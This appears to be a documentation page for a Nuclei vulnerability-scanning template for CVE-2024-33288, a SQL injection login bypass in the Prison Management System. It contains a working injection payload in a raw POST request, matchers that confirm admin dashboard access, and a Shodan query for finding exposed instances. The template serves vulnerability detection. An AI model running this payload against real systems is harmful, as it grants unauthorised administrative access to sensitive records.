Prison Management System - SQL Injection Authentication Bypass
ID: CVE-2024-33288
Severity: high
Author: s4e-io
Tags: cve,cve2024,cms,sqli
Description
Section titled “Description”Sql injection vulnerability was found on the login page in Prison Management System
YAML Source
Section titled “YAML Source”id: CVE-2024-33288
info: name: Prison Management System - SQL Injection Authentication Bypass author: s4e-io severity: high description: | Sql injection vulnerability was found on the login page in Prison Management System reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html classification: cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: prison_management_system_project product: prison_management_system shodan-query: title:"Prison Management System" tags: cve,cve2024,cms,sqli
http: - raw: - | POST /Admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin= - | GET /Admin/index.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word words: - "<p>Change Password</p>" - "<p>Logout</p>" - "Admin Dashboard | Prison Management system" condition: and
- type: status status: - 200# digest: 4b0a00483046022100c019f80114790b492d01887238b91e3a76be532014761cecf1db4031531ef956022100804e12aab7437b3605df406487ab6d917c25c9a0fac28e3f2faba312d0f29a73:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-33288.yaml"